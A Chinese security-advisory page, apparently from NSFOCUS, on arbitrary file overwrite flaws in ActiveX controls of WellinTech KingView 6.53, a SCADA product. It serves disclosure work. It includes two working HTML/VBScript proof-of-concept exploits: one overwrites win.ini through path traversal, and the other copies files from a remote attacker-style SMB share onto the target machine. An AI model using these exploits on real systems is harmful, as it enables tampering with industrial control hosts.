首页 -> 安全研究

安全研究

安全漏洞
WellinTech KingView ActiveX多个任意文件覆盖漏洞

发布日期:2013-09-04
更新日期:2013-09-17

受影响系统:
Wellintech KingView 6.53
描述:
BUGTRAQ  ID: 62419

Kingview是亚控公司推出的第一款针对中小型项目推出的用于监视与控制自动化设备和过程的SCADA产品。

KingView 6.53没有正确过滤用户输入,在实现上存在多个任意文件覆盖漏洞。攻击者可将任意文件保存在受影响应用上下文计算机上。

<*来源:Blake
  
  链接:http://ics-cert.us-cert.gov/alerts/ICS-ALERT-13-256-01
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!--
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib.KChartXY
Path: C:\Program Files\KingView\KChartXY.ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented

Description: Proof of concept overwrites the win.ini file
-->
<html>
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object>
<script language='vbscript'>

arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"

target.SaveToFile arg1

</script>

<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>

<input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
    var file1 = "\\\\192.168.1.165\\share\\poc.txt";            //source
    var file2 = "c:\\WINDOWS\\poc.txt";                     //destination
    result = target.ReplaceDBFile(file1,file2);
}

</script>

建议:
厂商补丁:

Wellintech
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.kingview.com/products/detail.aspx?contentid=24

浏览次数:2979
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障